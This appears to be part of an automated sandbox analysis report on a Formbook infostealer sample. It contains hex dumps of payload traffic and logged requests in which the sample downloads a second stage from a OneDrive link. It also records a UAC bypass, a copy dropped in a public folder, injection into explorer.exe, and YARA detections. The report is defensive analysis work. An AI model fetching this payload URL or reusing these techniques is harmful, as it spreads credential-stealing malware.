4f e0 eb cc 47 74 49 49 f3 53 57 dd d6 d6 9c bd d5 de 8d 48 23 c1 dc 89 0f 2f d7 56 4e 8c b3 28 c2 49 a6 85 f8 f3
                                                                                                Data Ascii: 8'`Z*?P`Z+U6A*`L|};-O,bL1Bb2A:RG|?J85U2Y;B@n77I!M,1j,J=^PSK":`34!T9*^q:fTPNT2LVuTI+Cy3VM}l9OGtIISWH#/VN(I
                                                                                                2022-08-08 18:12:31 UTC138INData Raw: d7 de 8d ac 50 60 4a cd fd c7 bf 5e 0f 16 36 2f 65 40 c2 a8 23 e0 d1 e0 54 a9 a8 1a 38 02 42 aa 68 8b ee 8e f6 26 13 6c 3a 8d b5 8a a6 d8 d6 51 11 16 ad 2d 12 51 f5 61 2f 91 4d 4c 5e 11 22 e5 23 be d1 0f bd 90 ae 27 d6 36 52 64 11 31 78 ae da 13 56 4e d7 71 53 b0 7f dc 31 d6 ca 1b 79 c8 5c d1 2e 39 86 b8 ae 85 ce b5 4c d3 e5 10 f3 a8 bd 8a 8f ae 99 c7 c5 89 80 d9 54 12 e0 0c bc c7 96 18 49 a7 da 0b 93 0d bd f2 5d dc 16 92 c5 ec f2 3f 79 fd 64 f0 71 4d 16 a2 66 fe fe 4b 0a a0 d1 02 f2 c8 6e 8e bf 25 04 e0 72 03 56 ba 65 d0 ed 0d 52 c4 f2 dc e7 a4 c5 2f fe e2 6c 11 c7 35 e8 57 35 08 3f 4c 52 55 bd db 33 2f 33 52 9b 08 94 72 3a 88 91 f8 9c 15 bd d3 b2 ca 8b 4f c5 50 60 53 8b c9 f9 d1 49 48 a6 34 bf d3 c5 c9 c1 bf 25 d8 e4 89 a8 88 6d 43 d0 75 0d c3 43 d3 d1
                                                                                                Data Ascii: P`J^6/e@#T8Bh&l:Q-Qa/ML^"#'6Rd1xVNqS1y\.9LTI]?ydqMfKn%rVeR/l5W5?LRU3/3Rr:OP`SIH4%mCuC
                                                                                                2022-08-08 18:12:31 UTC146INData Raw: d3 98 5a 0f 4e 54 54 d0 4f 85 56 c6 64 fb 54 d3 c3 4d dc 18 c1 f9 c5 94 4e 5e c1 3b c8 0c c9 88 c1 a8 c3 bd c3 77 c8 0a 29 8d 02 bd cf 54 6b 3a 38 3d 8d 57 bd c5 dd 5b 6a c0 52 64 4a 38 de b1 c0 d7 56 bb 09 ab 28 33 bd d3 d0 9d c1 bf 68 65 f5 d1 bd 52 3e 9b d6 9c 62 ff 4c fd 60 50 cf a1 cc 16 cf 8c 5e ff 54 58 5e a9 3b 7b 4c 92 5e 8a 52 5a c9 2c 43 97 c5 41 bd 98 cd 60 5e ad ca 14 d3 9c d3 ff d5 54 54 34 39 24 66 15 bf 9e c5 5e d5 47 dc 0c 5a 8e bf 9c 54 5c 64 d0 39 97 64 fd c5 be c3 bd d7 51 ce 22 c5 23 bf c0 c1 cf c3 02 e6 93 c1 a8 52 dc c3 cf c3 88 e4 24 60 25 5e 55 d3 4c bb 13 de 93 ae f7 5f 62 c3 d7 fd 4b 42 50 60 76 91 7e b4 bf 66 bb c4 4f 38 be 54 cb 50 2f 3a 42 2f 62 4c 43 99 64 bd 68 76 6a 4c d3 d1 8c 5a 54 52 1f e0 79 5e 09 c5 15 cb 50 c5 b6 43
                                                                                                Data Ascii: ZNTTOVdTMN^;w)Tk:8=W[jRdJ8V(3heR>bL`P^TX^;{L^RZ,CA`^TT49$f^GZT\d9dQ"#R$`%^UL_bKBP`v~fO8TP/:B/bLCdhvjLZTRy^PC
                                                                                                2022-08-08 18:12:31 UTC154INData Raw: 07 bd 62 d5 c1 2c 42 50 8a d7 0c 53 c7 c5 86 ca d9 1d 21 54 de 9b c7 c3 cb b7 dc 2d 1e ca b2 81 d2 cd 60 cf c3 dd b4 be 4a 2d b5 c6 54 c1 64 56 2a a1 c7 bd 64 25 94 d1 bf d3 64 55 c0 0b c0 50 4d b0 10 3b cf d5 72 1e 7a 1b 1f 62 60 c5 cb 49 3f 38 d3 0c 53 c7 56 64 71 d9 19 c3 bd 56 5e 38 44 29 5e 15 e9 10 c4 aa 81 d2 74 4b cb 4c 7e 5e eb 48 a6 37 11 54 c1 ef 6c f5 2f b4 4e d7 50 cf 3d 43 34 b9 26 cc bf 56 48 09 78 21 37 0b d5 4c c1 62 ad ab 60 a4 1d cb c5 50 22 53 31 1e c8 25 95 57 50 c5 58 85 6a 37 25 52 5a c9 60 e0 2a 42 62 4e 52 a3 e9 29 4c 54 b9 d3 3d 34 c3 d5 c1 50 cc 3a e6 ff c7 bf 66 13 85 d1 4c 5e 93 82 23 4e 54 c1 cd a7 ab c7 cf 7a e6 dd 2b 21 bd 62 d5 c1 e4 42 c4 8a 4b d5 ae 7b c8 58 cb df 15 6a 25 1f cf 56 c7 cb 32 a7 ba 0b 29 0d 4e 8a 5c d4 5b
                                                                                                Data Ascii: b,BPS!T-`J-TdV*d%dUPM;rzb`I?8SVdqV^8D)^tKL~^H7Tl/NP=C4&VHx!7Lb`P"S1%WPXj7%RZ`*BbNR)LT=4P:fL^#NTz+!bBK{Xj%V2)N\[
                                                                                                2022-08-08 18:12:31 UTC162INData Raw: 12 52 5b c0 c8 cf 56 c5 c3 2a da 3c d7 60 be c5 69 99 9a 13 29 49 65 d3 c3 62 54 bf ca 0e 8b 65 8d 04 1e f8 66 54 5c d1 4b 62 54 5c cb 63 b1 3d cc d1 bd 50 54 cb b1 3d d3 c3 4a b9 6d ad 51 54 52 b9 c5 bf 2a 3d da 58 cb 50 54 84 3f 45 66 fd 43 cb cd d1 72 4d c6 6f 3a e9 d1 60 cb bb cf 52 9f 1c b2 c3 d5 52 58 cf 42 83 27 c7 bf 66 54 3a 36 7f 71 7f 5d c1 bf 56 c5 56 53 dc c7 cf d3 d5 c2 de ca bd 62 d7 cb ac b1 3b f4 d3 ca 6e 6d 86 2c 1a 4c 14 bf cc 4e 99 85 4e ba f5 93 0e 9b 48 48 0e 74 c5 88 03 a4 0d 95 18 f0 bd f0 b4 73 b5 b8 1f cd 66 c5 c7 52 47 bb 34 21 e7 08 8c a0 e3 88 f3 77 d0 e8 35 62 1a c1 fb c2 57 50 9c 45 e4 d3 8a 65 da 1b ff f4 e2 c6 d5 e0 b9 aa b7 1d fd 50 c8 08 69 19 9e a9 37 d1 a7 23 eb 68 1c 8c 9c 1a 90 8d e8 d2 4a a8 3d f8 22 d6 62 84 47 ed
                                                                                                Data Ascii: R[V*<`i)IebTefT\KbT\c=PT=JmQTR*=XPT?EfCrMo:`RRXB'fT:6q]VVSb;nm,LNNHHtsfRG4!w5bWPEePi7#hJ="bG
                                                                                                2022-08-08 18:12:31 UTC170INData Raw: c7 20 dc cb 4c 5a c5 eb 21 c3 de a3 a8 c1 d1 52 8d 99 40 bf 66 54 36 4d be 93 ca 62 7d d2 54 54 50 1d 74 1f bc 54 39 42 62 52 4c 83 4d c0 58 f8 02 d2 5e f2 5e c7 c5 74 55 c0 c5 3d 54 0e 53 56 52 54 c1 78 25 2d d5 ce 3a a9 a2 91 55 c5 79 d0 62 c3 4c 3d 7c a8 60 be b1 2f d7 56 bb 26 b3 28 a8 01 62 ca b6 7d d2 cd 40 5c d1 48 17 86 2d ae 19 2f c3 bd d7 91 3e 2c 27 d3 3b 28 c0 d2 42 b4 a6 1a ce bc 0e 41 52 5e 72 26 f3 b6 9b a6 ee 9e 31 4c 4e 5a c5 55 3a c5 4e 3d 67 eb 1f d5 54 56 54 a9 2a c4 56 4e 62 68 28 36 bf 60 e4 db d9 ac c5 c5 5e 5c 17 c7 cf 62 c9 ca a5 42 4c d3 d1 c1 f6 99 44 c7 4a 48 22 ca 54 58 c5 86 6c 1f 5c ac 99 25 52 5a c9 20 ab 99 c5 62 bd 9b e0 b0 1a d2 bd 81 de c3 62 cf 6c dd 19 33 66 41 a1 c7 bf 66 8f 53 b0 4c ee 04 57 50 5d 1d bd 13 a5 25 ba
                                                                                                Data Ascii: LZ!R@fT6Mb}TTPtT9BbRLMX^^tU=TSVRTx%-:UybL=|`/V&(b}@\H-/>,';(BAR^r&1LNZU:N=gTVT*VNbh(6`^\bBLDJH"TXl\%RZ bbl3fAfSLWP]%
                                                                                                2022-08-08 18:12:31 UTC186INData Raw: e0 20 ee 56 5e a3 a2 b3 d8 52 bf e8 37 d9 33 b6 c1 7f e2 50 cd 20 aa f1 5a c1 b3 21 0a b5 21 92 1b d3 13 a5 25 be d1 4f c9 3a c2 b2 7f 8e 43 3e 09 37 33 80 51 0a 2d 8d a0 82 a3 13 9e 96 54 cf d1 bf d3 c5 ba 2d 41 0c e7 a0 b0 bd 3b b2 18 d0 4b 62 c1 06 cd e9 ac 37 27 53 56 9a a8 66 19 40 c9 5a 21 b4 44 a9 c3 fc 33 7f e6 cd d3 d0 fd dd be ae d7 d0 36 5a 88 63 03 cf 5a de 7f 92 6a b5 94 17 cd 66 c7 bf 66 54 2f 1d 41 1a 15 78 8c 2f 54 c8 21 1c 41 d8 5e d7 77 4f 7a 1f b0 31 41 48 9e 1d bb 21 2a 50 5e 27 25 9f 9f c1 54 52 4c 6f 42 40 52 69 19 1c 41 5e 56 de 89 e7 c0 c2 5e 51 42 bd a6 dc 0d 50 4c c8 c4 1c 3b cd 66 27 33 d8 b1 cf 62 3f 8d dd c6 c1 bd 46 c5 20 53 21 56 5e 38 a5 ab a5 b0 b4 d3 d1 21 2b b3 46 bf cf 52 9d c7 2d 55 24 c1 54 b2 ac cc 9b c7 f0 c3 41 89
                                                                                                Data Ascii: V^R73P Z!!%O:C>73Q-T-A;Kb7'SVf@Z!D36ZcZjffT/Ax/T!A^wOz1AH!*P^'%TRLoB@RiA^V^QBPL;f'3b?F S!V^8!+FR-U$TA
                                                                                                2022-08-08 18:12:31 UTC202INData Raw: e8 79 ea 0e 26 26 8d 79 ea 5d ec 97 5f 63 61 f0 26 26 ea 79 5d ea fc fe 5d ea e8 79 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                Data Ascii: y&&y]_ca&&y]]y


                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                4192.168.2.34974913.107.43.13443C:\Users\user\Desktop\TR0627729920002.exe
                                                                                                TimestampkBytes transferredDirectionData
                                                                                                2022-08-08 18:12:41 UTC203OUTGET /download?cid=E0CF7F9E6AAF27EF&resid=E0CF7F9E6AAF27EF%21235&authkey=AEqvXl2m1mKwj2I HTTP/1.1
                                                                                                User-Agent: lVali
                                                                                                Host: onedrive.live.com
                                                                                                Cookie: wla42=
                                                                                                2022-08-08 18:12:42 UTC203INHTTP/1.1 302 Found
                                                                                                Cache-Control: no-cache, no-store
                                                                                                Pragma: no-cache
                                                                                                Content-Type: text/html
                                                                                                Expires: -1
                                                                                                Location: https://2q5ira.ph.files.1drv.com/y4mAWAqMZkm6zn3dSzDj3WPCBsX3RiZWbRG2DylLyNQaP0-LRMHmuxHvvhn3WeqC6IbuXIZ_2I4C3PojU1dZgDhrXJBVB63YBUJKqqRkP-IEkzXLZw71Of_tNPTtLGQqfZOrHxLg61l9viQ3pKXrp-sUeAuTKn0iPy-2cfCXZbcG_ZGSYZuCyLvmDB04kuOcNBkhE8CTxnABbCHzCt4JBOlJw/Jwjxmakrvkwfuijrnbpqlslhsyeopao?download&psid=1
                                                                                                Set-Cookie: E=P:coPnlWl52og=:jQKaqIdbTF+RdlyVyh71o7Gmkxxrh1geX32aI5L/YkQ=:F; domain=.live.com; path=/
                                                                                                Set-Cookie: xid=fab364d8-f922-4657-9398-1683e07a885a&&RD0003FF11DA51&264; domain=.live.com; path=/
                                                                                                Set-Cookie: xidseq=1; domain=.live.com; path=/
                                                                                                Set-Cookie: LD=; domain=.live.com; expires=Mon, 08-Aug-2022 16:32:41 GMT; path=/
                                                                                                Set-Cookie: wla42=; domain=live.com; expires=Mon, 15-Aug-2022 18:12:42 GMT; path=/
                                                                                                X-Content-Type-Options: nosniff
                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                X-MSNServer: RD0003FF11DA51
                                                                                                X-ODWebServer: centralus1-odwebpl
                                                                                                X-Cache: CONFIG_NOCACHE
                                                                                                X-MSEdge-Ref: Ref A: 1D644258262448548D0F52989466A4E2 Ref B: VIEEDGE1607 Ref C: 2022-08-08T18:12:41Z
                                                                                                Date: Mon, 08 Aug 2022 18:12:41 GMT
                                                                                                Connection: close
                                                                                                Content-Length: 0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                5192.168.2.34975113.107.43.13443C:\Users\user\Desktop\TR0627729920002.exe
                                                                                                TimestampkBytes transferredDirectionData
                                                                                                2022-08-08 18:12:43 UTC204OUTGET /download?cid=E0CF7F9E6AAF27EF&resid=E0CF7F9E6AAF27EF%21235&authkey=AEqvXl2m1mKwj2I HTTP/1.1
                                                                                                User-Agent: 6
                                                                                                Host: onedrive.live.com
                                                                                                Cookie: wla42=; E=P:coPnlWl52og=:jQKaqIdbTF+RdlyVyh71o7Gmkxxrh1geX32aI5L/YkQ=:F; xid=fab364d8-f922-4657-9398-1683e07a885a&&RD0003FF11DA51&264; xidseq=1
                                                                                                2022-08-08 18:12:43 UTC204INHTTP/1.1 302 Found
                                                                                                Cache-Control: no-cache, no-store
                                                                                                Pragma: no-cache
                                                                                                Content-Type: text/html
                                                                                                Expires: -1
                                                                                                Location: https://2q5ira.ph.files.1drv.com/y4mzqjhhxuQPPuOmBSzbYlb6397m5X2vhHIqRXXBSV57d_1VgTXNCbbqjd0KHfm6XfB-APegcmQN7te3rF1BweJguh3qSXQtz5HjHD1Oeb1rhGAVZxlmJJDRuru-ZokmO3WslqCwp4uwH-0Bz-RAiuW8yOIz2aSjxSINj04gEiLnwj5gXsZIUGjF8OolqYoNBKg4xWUCyYnMRy1PGPoOtHn0Q/Jwjxmakrvkwfuijrnbpqlslhsyeopao?download&psid=1
                                                                                                Set-Cookie: E=P:vGe+lml52og=:ZhqIJdNqImi1evTziB19nFgjLEd6fVisP0u5IpOTZD0=:F; domain=.live.com; path=/
                                                                                                Set-Cookie: xidseq=2; domain=.live.com; path=/
                                                                                                Set-Cookie: LD=; domain=.live.com; expires=Mon, 08-Aug-2022 16:32:43 GMT; path=/
                                                                                                Set-Cookie: wla42=; domain=live.com; expires=Mon, 15-Aug-2022 18:12:43 GMT; path=/
                                                                                                X-Content-Type-Options: nosniff
                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                X-MSNServer: RD00155D9975FB
                                                                                                X-ODWebServer: eastus1-odwebpl
                                                                                                X-Cache: CONFIG_NOCACHE
                                                                                                X-MSEdge-Ref: Ref A: AFD5B197D14F413AA0CBD099E840A394 Ref B: VIEEDGE1007 Ref C: 2022-08-08T18:12:43Z
                                                                                                Date: Mon, 08 Aug 2022 18:12:43 GMT
                                                                                                Connection: close
                                                                                                Content-Length: 0


                                                                                                Statistics

                                                                                                Behavior

                                                                                                Click to jump to process

                                                                                                System Behavior

                                                                                                General

                                                                                                Target ID:0
                                                                                                Start time:20:12:05
                                                                                                Start date:08/08/2022
                                                                                                Path:C:\Users\user\Desktop\TR0627729920002.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:"C:\Users\user\Desktop\TR0627729920002.exe"
                                                                                                Imagebase:0x400000
                                                                                                File size:938496 bytes
                                                                                                MD5 hash:8DBFE68662123710D83FEF939287D9A3
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:Borland Delphi
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source: 00000000.00000002.276683470.0000000002718000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.278080538.0000000003CE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.278080538.0000000003CE0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.278080538.0000000003CE0000.00000004.00001000.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.278080538.0000000003CE0000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                • Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source: 00000000.00000002.276153005.0000000002162000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                Reputation:low

                                                                                                General

                                                                                                Target ID:5
                                                                                                Start time:20:12:20
                                                                                                Start date:08/08/2022
                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /k
                                                                                                Imagebase:0xc20000
                                                                                                File size:232960 bytes
                                                                                                MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.411833760.0000000050410000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.411833760.0000000050410000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.411833760.0000000050410000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.411833760.0000000050410000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.407639397.00000000036E0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.407639397.00000000036E0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.407639397.00000000036E0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.407639397.00000000036E0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.407600284.00000000036B0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.407600284.00000000036B0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.407600284.00000000036B0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.407600284.00000000036B0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.273665319.0000000050410000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000000.273665319.0000000050410000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.273665319.0000000050410000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.273665319.0000000050410000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.274126698.0000000050410000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000000.274126698.0000000050410000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.274126698.0000000050410000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.274126698.0000000050410000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.275130208.0000000050410000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000000.275130208.0000000050410000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.275130208.0000000050410000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.275130208.0000000050410000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.274615202.0000000050410000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000000.274615202.0000000050410000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.274615202.0000000050410000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.274615202.0000000050410000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                Reputation:high

                                                                                                General

                                                                                                Target ID:6
                                                                                                Start time:20:12:21
                                                                                                Start date:08/08/2022
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff7c9170000
                                                                                                File size:625664 bytes
                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high

                                                                                                General

                                                                                                Target ID:7
                                                                                                Start time:20:12:26
                                                                                                Start date:08/08/2022
                                                                                                Path:C:\Windows\explorer.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\Explorer.EXE
                                                                                                Imagebase:0x7ff6b8cf0000
                                                                                                File size:3933184 bytes
                                                                                                MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000000.366747947.000000000D346000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000000.366747947.000000000D346000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000000.366747947.000000000D346000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000000.366747947.000000000D346000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000000.393025016.000000000D346000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000000.393025016.000000000D346000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000000.393025016.000000000D346000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000000.393025016.000000000D346000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                Reputation:high

                                                                                                General

                                                                                                Target ID:8
                                                                                                Start time:20:12:27
                                                                                                Start date:08/08/2022
                                                                                                Path:C:\Users\Public\Libraries\Jwjxmakrv.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:"C:\Users\Public\Libraries\Jwjxmakrv.exe"
                                                                                                Imagebase:0x400000
                                                                                                File size:938496 bytes
                                                                                                MD5 hash:8DBFE68662123710D83FEF939287D9A3
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:Borland Delphi
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source: 00000008.00000002.326814708.0000000002868000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.328666768.000000000366B000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.328666768.000000000366B000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.328666768.000000000366B000.00000004.00001000.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.328666768.000000000366B000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.329116862.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.329116862.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.329116862.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.329116862.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                Antivirus matches:
                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                • Detection: 29%, ReversingLabs
                                                                                                Reputation:low

                                                                                                General

                                                                                                Target ID:14
                                                                                                Start time:20:12:38
                                                                                                Start date:08/08/2022
                                                                                                Path:C:\Users\Public\Libraries\Jwjxmakrv.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:"C:\Users\Public\Libraries\Jwjxmakrv.exe"
                                                                                                Imagebase:0x400000
                                                                                                File size:938496 bytes
                                                                                                MD5 hash:8DBFE68662123710D83FEF939287D9A3
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:Borland Delphi
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source: 0000000E.00000002.352406046.0000000000828000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                Reputation:low

                                                                                                General

                                                                                                Target ID:19
                                                                                                Start time:20:12:43
                                                                                                Start date:08/08/2022
                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /k
                                                                                                Imagebase:0xc20000
                                                                                                File size:232960 bytes
                                                                                                MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
